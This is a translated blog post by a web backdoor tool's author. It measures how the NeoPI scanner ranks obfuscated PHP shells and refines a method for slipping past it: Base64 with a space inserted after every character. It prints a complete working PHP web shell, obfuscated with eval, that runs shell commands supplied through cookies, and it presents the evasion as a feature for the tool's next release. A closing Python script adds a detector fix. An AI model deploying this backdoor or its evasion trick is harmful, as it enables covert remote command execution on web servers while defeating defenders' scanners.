To strengthen WeBaCoo's ability to evade malicious-code detection, I have lately been testing a variety of tools and methods for hiding web shell code. The latest tool I came across is NeoPI, a Python script that uses several statistical methods to search script files for potentially obfuscated or encoded malicious code.
NeoPI ranks files as suspect by entropy, longest word and index of coincidence. Unfortunately, WeBaCoo's Base64-encoded backdoor code did not pass NeoPI's scan: it ranked in the top ten suspicious files. So, in order to find an effective evasion method, I did a deeper analysis of NeoPI.
I mentioned NeoPI in an earlier post (web backdoor detection), although so far I have not found a use for this tool in a real-world environment.
The tool has five test types:
1. Entropy: measures the uncertainty of the file, using the ASCII table. (more info)
2. Longest Word: the longest string in the file, which may have been encoded or obfuscated.
3. Index of Coincidence: a low IC suggests the file's code may have been encrypted or obfuscated. (more info)
4. Signature: searches the file for known malicious code string fragments.
5. Compression: compares the file's compression ratio. (more info)
To test NeoPI's effectiveness on a fully deployed web application, I set up three CMSs (Joomla, WordPress and Coppermine) on a Debian virtual machine. In the web root I placed two files generated by WeBaCoo: webacoo.php (Base64-obfuscated) and webacoo_raw.php (raw, unprocessed PHP code).
To make the results more precise, the scan was restricted to files with the .php extension. The initial report, with all tests run over the webroot path, is as follows:
root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/ \.php$
[[ Total files scanned: 10235 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 48.170000 seconds ]]
[[ Top 10 entropic files for a given search ]]
6.1817 /var/www/gallery/lang/chinese_gb.php
6.1784 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
6.1710 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
5.8753 /var/www/blog/wp-admin/js/revisions-js.php
5.7846 /var/www/gallery/lang/japanese.php
5.7306 /var/www/webacoo.php
5.6484 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
5.6296 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
5.6203 /var/www/plugins/system/nonumberelements/helper.php
5.6133 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
[[ Top 10 longest word files ]]
745 /var/www/gallery/include/exif_php.inc.php
745 /var/www/gallery/exifmgr.php
741 /var/www/gallery/lang/japanese.php
728 /var/www/blog/wp-admin/js/revisions-js.php
522 /var/www/blog/wp-includes/functions.php
516 /var/www/libraries/tcpdf/tcpdf.php
474 /var/www/plugins/content/jw_allvideos/includes/sources.php
456 /var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
436 /var/www/gallery/lang/chinese_gb.php
354 /var/www/blog/wp-includes/class-simplepie.php
[[ Average IC for Search ]]
0.0372679517799
[[ Top 10 lowest IC files ]]
0.0198 /var/www/webacoo.php
0.0206 /var/www/gallery/lang/chinese_gb.php
0.0217 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
0.0217 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
0.0217 /var/www/templates/system/index.php
0.0217 /var/www/administrator/templates/system/index.php
0.0222 /var/www/blog/wp-content/themes/lightword/alternatives/404.php
0.0226 /var/www/blog/wp-admin/js/revisions-js.php
0.0270 /var/www/includes/HTML_toolbar.php
0.0272 /var/www/templates/beez/html/com_user/reset/complete.php
[[ Top 10 signature match counts ]]
43 /var/www/gallery/include/themes.inc.php
43 /var/www/gallery/themes/sample/theme.php
26 /var/www/blog/wp-admin/includes/class-ftp.php
19 /var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
14 /var/www/libraries/geshi/geshi/php.php
13 /var/www/blog/wp-includes/Text/Diff/Engine/native.php
10 /var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
9 /var/www/gallery/include/functions.inc.php
8 /var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
8 /var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
[[ Top 10 compression match counts ]]
1.0704 /var/www/administrator/templates/system/index.php
1.0704 /var/www/templates/system/index.php
1.0000 /var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
1.0000 /var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
0.9663 /var/www/blog/wp-content/themes/lightword/alternatives/404.php
0.8958 /var/www/includes/mambo.php
0.8860 /var/www/includes/joomla.php
0.8821 /var/www/includes/vcard.class.php
0.8818 /var/www/includes/PEAR/PEAR.php
0.8796 /var/www/includes/HTML_toolbar.php
[[ Top cumulative ranked files ]]
122 /var/www/webacoo.php
202 /var/www/blog/wp-admin/js/revisions-js.php
528 /var/www/plugins/content/jw_allvideos/includes/elements/header.php
912 /var/www/plugins/content/jw_allvideos/includes/helper.php
984 /var/www/modules/mod_archive/helper.php
1100 /var/www/libraries/bitfolge/vcard.php
1210 /var/www/administrator/components/com_content/elements/article.php
1240 /var/www/gallery/addfav.php
1246 /var/www/administrator/components/com_installer/admin.installer.php
1258 /var/www/administrator/components/com_config/views/component/view.php

As can be seen, webacoo_raw.php passed the scan, while the obfuscated code (webacoo.php) was not so lucky: it scored high on both entropy and index of coincidence and was flagged as a malicious file in the results. Besides those two scores, the obfuscated code also scored highest in the longest-word test, but that result is less telling, because the CMSs in my test environment also contain some long but legitimate strings and code that trigger the same test.
These high scores are caused by the Base64 encoding of the payload. To bypass them, the generated code must have some new characteristics that defeat these tests.
My first idea was to split the encoded code into small chunks and reassemble them into the full payload at the end. Subsequent tests showed, however, that this did not effectively bypass the index-of-coincidence and entropy checks.
The second approach was to insert spaces into the encoded code (a space is not a valid Base64 character) and strip them with a replace function before decoding.
The question then is: after how many Base64 characters should a space be inserted for the best result? To find the most effective value, I created a series of files in which the Base64-encoded code is split into groups of different sizes (a space after every 1, 5, 10 and 20 characters), and ran NeoPI to compare the results.
root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/pwn/ \.php$
[[ Total files scanned: 30 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 0.010000 seconds ]]
[[ Top 10 entropic files for a given search ]]
5.7646 /var/www/pwn/webacoo_new20.php
5.7306 /var/www/pwn/webacoo.php
5.6999 /var/www/pwn/webacoo_new10.php
5.5322 /var/www/pwn/webacoo_new5.php
5.1328 /var/www/pwn/webacoo_raw.php
4.2037 /var/www/pwn/webacoo_new1.php
[[ Top 10 longest word files ]]
295 /var/www/pwn/webacoo.php
94 /var/www/pwn/webacoo_raw.php
51 /var/www/pwn/webacoo_new1.php
51 /var/www/pwn/webacoo_new10.php
51 /var/www/pwn/webacoo_new5.php
51 /var/www/pwn/webacoo_new20.php
[[ Average IC for Search ]]
0.040872937004
[[ Top 10 lowest IC files ]]
0.0194 /var/www/pwn/webacoo_new20.php
0.0198 /var/www/pwn/webacoo.php
0.0224 /var/www/pwn/webacoo_new10.php
0.0301 /var/www/pwn/webacoo_raw.php
0.0338 /var/www/pwn/webacoo_new5.php
0.2009 /var/www/pwn/webacoo_new1.php
[[ Top 10 signature match counts ]]
1 /var/www/pwn/webacoo.php
1 /var/www/pwn/webacoo_raw.php
1 /var/www/pwn/webacoo_new1.php
1 /var/www/pwn/webacoo_new10.php
1 /var/www/pwn/webacoo_new5.php
1 /var/www/pwn/webacoo_new20.php
[[ Top 10 compression match counts ]]
0.8114 /var/www/pwn/webacoo_new10.php
0.8101 /var/www/pwn/webacoo_new20.php
0.7993 /var/www/pwn/webacoo.php
0.7947 /var/www/pwn/webacoo_new5.php
0.7593 /var/www/pwn/webacoo_raw.php
0.5407 /var/www/pwn/webacoo_new1.php
[[ Top cumulative ranked files ]]
8 /var/www/pwn/webacoo_new20.php
9 /var/www/pwn/webacoo.php
11 /var/www/pwn/webacoo_new10.php
17 /var/www/pwn/webacoo_new5.php
17 /var/www/pwn/webacoo_raw.php
22 /var/www/pwn/webacoo_new1.php

webacoo_new20.php (a space every 20 characters) performed worst (even worse than the earlier result without spaces). On the other hand, webacoo_new1.php (a space after every character) got the lowest score in every test and turned out to be the most effective choice (even better than the raw, unprocessed code).
So the latest backdoor file code capable of passing NeoPI's scan is as follows:
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = ")));?>

root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/ \.php$
[[ Total files scanned: 10230 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 46.120000 seconds ]]
[[ Top 10 entropic files for a given search ]]
6.1817 /var/www/gallery/lang/chinese_gb.php
6.1784 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
6.1710 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
5.8753 /var/www/blog/wp-admin/js/revisions-js.php
5.7846 /var/www/gallery/lang/japanese.php
5.6484 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
5.6296 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
5.6203 /var/www/plugins/system/nonumberelements/helper.php
5.6133 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
5.6060 /var/www/blog/wp-config.php
[[ Top 10 longest word files ]]
745 /var/www/gallery/include/exif_php.inc.php
745 /var/www/gallery/exifmgr.php
741 /var/www/gallery/lang/japanese.php
728 /var/www/blog/wp-admin/js/revisions-js.php
522 /var/www/blog/wp-includes/functions.php
516 /var/www/libraries/tcpdf/tcpdf.php
474 /var/www/plugins/content/jw_allvideos/includes/sources.php
456 /var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
436 /var/www/gallery/lang/chinese_gb.php
354 /var/www/blog/wp-includes/class-simplepie.php
[[ Average IC for Search ]]
0.0372700176166
[[ Top 10 lowest IC files ]]
0.0206 /var/www/gallery/lang/chinese_gb.php
0.0217 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
0.0217 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
0.0217 /var/www/templates/system/index.php
0.0217 /var/www/administrator/templates/system/index.php
0.0222 /var/www/blog/wp-content/themes/lightword/alternatives/404.php
0.0226 /var/www/blog/wp-admin/js/revisions-js.php
0.0270 /var/www/includes/HTML_toolbar.php
0.0272 /var/www/templates/beez/html/com_user/reset/complete.php
0.0273 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
[[ Top 10 signature match counts ]]
43 /var/www/gallery/include/themes.inc.php
43 /var/www/gallery/themes/sample/theme.php
26 /var/www/blog/wp-admin/includes/class-ftp.php
19 /var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
14 /var/www/libraries/geshi/geshi/php.php
13 /var/www/blog/wp-includes/Text/Diff/Engine/native.php
10 /var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
9 /var/www/gallery/include/functions.inc.php
8 /var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
8 /var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
[[ Top 10 compression match counts ]]
1.0704 /var/www/administrator/templates/system/index.php
1.0704 /var/www/templates/system/index.php
1.0000 /var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
1.0000 /var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
0.9663 /var/www/blog/wp-content/themes/lightword/alternatives/404.php
0.8958 /var/www/includes/mambo.php
0.8860 /var/www/includes/joomla.php
0.8821 /var/www/includes/vcard.class.php
0.8818 /var/www/includes/PEAR/PEAR.php
0.8796 /var/www/includes/HTML_toolbar.php
[[ Top cumulative ranked files ]]
199 /var/www/blog/wp-admin/js/revisions-js.php
521 /var/www/plugins/content/jw_allvideos/includes/elements/header.php
907 /var/www/plugins/content/jw_allvideos/includes/helper.php
977 /var/www/modules/mod_archive/helper.php
1094 /var/www/libraries/bitfolge/vcard.php
1203 /var/www/administrator/components/com_content/elements/article.php
1233 /var/www/gallery/addfav.php
1240 /var/www/administrator/components/com_installer/admin.installer.php
1252 /var/www/administrator/components/com_config/views/component/view.php
1264 /var/www/xmlrpc/includes/framework.php

This latest web shell detection-evasion technique will be applied in the next version of WeBaCoo.
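The script below is an added example written for this page; it is neither NeoPI's code nor part of WeBaCoo. It re-implements the four statistical tests as the post describes them, reproduces the effect of spacing a Base64 blob every 1/5/10/20 characters on a constructed sample, and shows the defensive fix: strip whitespace before scoring, and treat a string literal that is half whitespace as a signal in its own right. The exact metric formulas (byte entropy, longest non-whitespace run, IC over all byte values, zlib ratio), the `whitespace_fraction_in_literal` heuristic and the sample blob are my assumptions, not NeoPI's precise implementation.

```python
"""NeoPI-style metrics plus a whitespace-normalisation step.
Added example, not NeoPI's or WeBaCoo's code; the metric definitions are
assumptions modelled on the post's descriptions."""
import base64
import hashlib
import math
import re
import zlib


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (assumed to match NeoPI's entropy test)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def longest_word(data: bytes) -> int:
    """Length of the longest run of non-whitespace bytes."""
    return max((len(w) for w in re.split(rb"\s+", data)), default=0)


def index_of_coincidence(data: bytes) -> float:
    """IC over all byte values: near 1/64 for Base64, higher for natural text."""
    n = len(data)
    if n < 2:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return sum(c * (c - 1) for c in counts) / (n * (n - 1))


def compression_ratio(data: bytes) -> float:
    """Compressed size / original size; lower means more redundancy."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def normalize(data: bytes) -> bytes:
    """Drop all whitespace before scoring. The padding trick only works
    because whitespace is counted as an ordinary symbol by every metric."""
    return re.sub(rb"\s+", b"", data)


def metrics(data: bytes) -> dict:
    return {
        "entropy": entropy(data),
        "longest_word": longest_word(data),
        "ic": index_of_coincidence(data),
        "compression": compression_ratio(data),
    }


def pad_every(text: bytes, group: int) -> bytes:
    """Insert one space after every `group` bytes (the post's 1/5/10/20 variants)."""
    return b" ".join(text[i:i + group] for i in range(0, len(text), group))


def whitespace_fraction_in_literal(php: bytes) -> float:
    """Hypothetical heuristic: share of whitespace inside the longest
    double-quoted literal. Prose runs around 15-20 %; "a W Y o ..." is 50 %."""
    literals = re.findall(rb'"([^"]*)"', php)
    if not literals:
        return 0.0
    longest = max(literals, key=len)
    if not longest:
        return 0.0
    return sum(1 for b in longest if b in b" \t\r\n") / len(longest)


# Constructed sample: Base64 of deterministic pseudo-random bytes stands in
# for an encoded blob. No real backdoor content is embedded here.
_BLOB = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(8))  # 256 bytes
B64 = base64.b64encode(_BLOB)
PADDED = {g: pad_every(B64, g) for g in (1, 5, 10, 20)}


if __name__ == "__main__":
    rows = [("raw base64", B64)] + [(f"space every {g}", p) for g, p in PADDED.items()]
    for label, data in rows:
        m, n = metrics(data), metrics(normalize(data))
        print(f"{label:15} raw: H={m['entropy']:.3f} word={m['longest_word']:4d} "
              f"IC={m['ic']:.4f} comp={m['compression']:.3f} | "
              f"normalised: H={n['entropy']:.3f} IC={n['ic']:.4f}")
```

Scored on the normalised content, all four padded variants yield exactly the raw-Base64 numbers, so the ranking advantage the post measured for webacoo_new1.php disappears. The literal heuristic flags the spaced payload independently, because roughly half of its characters are whitespace, far above the share found in natural-language strings.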
A. Bechtsoudis; translated by Pnig0s [Freebuf]